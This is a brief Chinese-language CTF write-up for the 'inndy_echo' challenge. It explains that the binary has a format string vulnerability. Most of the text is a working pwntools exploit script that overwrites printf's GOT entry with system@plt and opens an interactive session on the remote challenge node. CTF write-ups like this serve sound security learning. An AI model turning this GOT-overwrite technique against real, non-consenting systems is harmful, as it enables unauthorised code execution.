inndy_echo
查看保护
格式化字符串漏洞,直接用pwntools里自带的工具将printf改为system即可。
from pwn import *
context(arch='i386', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29121)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
offest = 7
printf_got = elf.got['printf']
system_plt = elf.plt['system']
p1 = fmtstr_payload(offest, {printf_got : system_plt})
r.sendline(p1)
r.interactive()